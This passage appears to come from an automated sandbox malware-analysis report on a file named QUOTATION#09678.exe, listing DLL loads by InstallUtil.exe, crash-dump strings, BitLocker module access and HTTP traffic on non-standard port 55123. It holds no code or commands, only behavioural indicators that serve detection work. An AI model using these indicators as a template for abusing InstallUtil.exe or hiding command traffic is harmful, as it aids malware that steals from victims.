                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: QUOTATION#09678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: QUOTATION#09678.exeStatic file information: File size 2789519 > 1048576
                    Source: QUOTATION#09678.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: QUOTATION#09678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb0 source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdbM source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WER9462.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER9462.tmp.dmp.10.dr
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E57960 push ebx; retf 0_2_00007FF848E5796A
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E57948 push ebx; retf 0_2_00007FF848E5796A
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E57940 push ebx; retf 0_2_00007FF848E5796A
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E56782 pushfd ; ret 0_2_00007FF848E56783
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E56088 push edi; retf 0008h0_2_00007FF848E56089
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848F20061 push esp; retf 4810h0_2_00007FF848F20312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.logJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 55123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55123 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 55123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55123 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 55123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55123 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 55123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55123 -> 49754
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
